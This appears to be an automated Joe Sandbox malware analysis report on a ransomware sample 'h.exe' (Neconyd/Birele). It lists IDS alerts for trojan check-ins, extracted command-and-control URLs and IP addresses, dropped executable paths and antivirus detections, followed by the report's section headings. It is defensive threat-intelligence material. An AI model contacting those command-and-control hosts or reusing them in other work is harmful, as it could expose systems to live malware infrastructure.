Source: http://ow5dirasuek.com/	Virustotal: Detection: 8%	Perma Link

Source: Traffic	Snort IDS: 2015786 ET TROJAN Ransom.Win32.Birele.gsg Checkin 192.168.2.7:49699 -> 193.166.255.171:80
Source: Traffic	Snort IDS: 2015786 ET TROJAN Ransom.Win32.Birele.gsg Checkin 192.168.2.7:49708 -> 64.225.91.73:80
Source: Traffic	Snort IDS: 2015786 ET TROJAN Ransom.Win32.Birele.gsg Checkin 192.168.2.7:49709 -> 34.41.229.245:80
Source: Traffic	Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.41.229.245:80 -> 192.168.2.7:49709
Source: Traffic	Snort IDS: 2015786 ET TROJAN Ransom.Win32.Birele.gsg Checkin 192.168.2.7:49713 -> 64.225.91.73:80

Source: Malware configuration extractor	URLs: http://ow5dirasuek.com/
Source: Malware configuration extractor	URLs: http://lousta.net/
Source: Malware configuration extractor	URLs: http://mkkuei4kdsz.com/

Source: Joe Sandbox View	IP Address: 64.225.91.73 64.225.91.73
Source: Joe Sandbox View	IP Address: 193.166.255.171 193.166.255.171
Source: Joe Sandbox View	IP Address: 193.166.255.171 193.166.255.171

Source: C:\Users\user\AppData\Roaming\omsecor.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Windows\SysWOW64\omsecor.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Source: C:\Users\user\AppData\Roaming\omsecor.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\omsecor.exe	Joe Sandbox ML: detected

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: FUNETASFI FUNETASFI
Source: Joe Sandbox View	ASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report h.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Neconyd

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\omsecor.exe

C:\Windows\SysWOW64\omsecor.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Windows Analysis Report
h.exe